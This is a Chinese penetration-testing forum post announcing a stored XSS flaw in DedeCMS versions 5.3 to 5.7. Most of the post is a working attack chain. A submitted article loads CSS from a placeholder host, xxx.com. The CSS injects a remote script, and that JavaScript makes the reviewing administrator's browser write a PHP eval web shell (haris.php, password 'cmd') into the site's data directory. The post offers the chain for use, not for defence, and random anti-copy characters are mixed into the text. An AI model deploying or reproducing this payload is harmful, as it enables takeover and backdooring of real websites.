中国网络渗透测试联盟

标题: dedecms xss oday通杀所有版本 可getshell [打印本页]

作者: admin    时间: 2012-9-15 13:56
标题: dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell$ Y% y4 I; `& t
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)$ k, Y7 v+ g; g
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。2 s% }  j2 F; t9 ?) A' L- Y
下面说说利用方法。
3 @( y, v! q2 m" o& ?! _5 m条件有2个:
: V: `3 p! k8 U& q$ x6 |# K1.开启注册& g8 u. ?  S0 [" x& D
2.开启投稿1 [' I" p% A1 A
注册会员----发表文章3 ^/ b: S2 X" T8 g
内容填写:8 u# ^1 O+ M. ?5 g( O
复制代码
3 q1 N3 t! H  b! h<style>@im\port'\http://xxx.com/xss.css';</style>
5 a; ]6 r! D  u新建XSS.Css
7 m  m4 V4 D. @: b, S复制代码
5 |% P5 ~1 d. K* @; R6 {. r# L, S' P.body{
. `5 D: Z) T% X7 ebackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
* b) ~" [  N: |1 [$ z3 _新建xss.js 内容为
! N( v; d5 W3 j# p- @复制代码
/ W7 Y' x! S4 M; G% y/ [1.var request = false;8 w; `1 I3 N+ v
2.if(window.XMLHttpRequest) {3 J% _7 b9 w! P% n% ~
3.request = new XMLHttpRequest();! i- b1 ~7 x6 k9 c2 o$ K
4.if(request.overrideMimeType) {
5 @' u2 T7 d9 b: `5.request.overrideMimeType('text/xml');
, F* z' ?6 t; ]$ o4 a$ |6.}9 {) u7 u# ^9 n  B7 Y6 P' n% N
7.} else if(window.ActiveXObject) {3 r/ v) q) f6 K" ^1 H0 T) I! m- J; m
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];8 j8 A) H- q  u# X& ~/ }
9.for(var i=0; i<versions.length; i++) {6 y1 ]  V/ a2 Y3 l
10.try {
8 k. j$ L9 u2 }4 _9 J8 \& d2 _1 W/ c2 ]11.request = new ActiveXObject(versions);
9 `# o. S, Q; i! F, v9 R12.} catch(e) {}
7 g: I# U2 j- F: z13.}$ a! U2 t$ p2 D6 E' g
14.}+ B# m* L0 u- X9 E4 r9 E
15.xmlhttp=request;
: E0 i" r( f8 Z! [1 ~0 _16.function getFolder( url ){
/ m1 l  d0 d( X- n7 s17. obj = url.split('/')
; M, F9 B! A/ ~18. return obj[obj.length-2]" o+ j& o/ n2 L5 x, R) H: f) \
19.}( S' L% m+ M7 Q  u, o9 }; Z# d! r
20.oUrl = top.location.href;: v0 S, R& m6 C: L: h
21.u = getFolder(oUrl);
3 O0 t* m8 `3 ]: P22.add_admin();: W. Z* F7 O- e' a4 [  m
23.function add_admin(){6 e/ `2 K! _  H& r0 A) l
24.var url= "/"+u+"/sys_sql_query.php";9 k7 \1 P. M* S2 c8 ?; v# c
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";$ p: D- X7 M/ Z7 \9 O  B2 e
26.xmlhttp.open("POST", url, true);" B! X: H4 [1 h  t/ o; i( \) w/ a( R
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
9 r5 K- {; D& t% v$ ^  a28.xmlhttp.setRequestHeader("Content-length", params.length);
( T# R+ w2 R8 \% V$ j: t( w( C29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");7 V6 m" l% o, Q
30.xmlhttp.send(params);, A3 m* y* Q) u) c
31.}8 l* z$ ^" Q) J# {" c
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2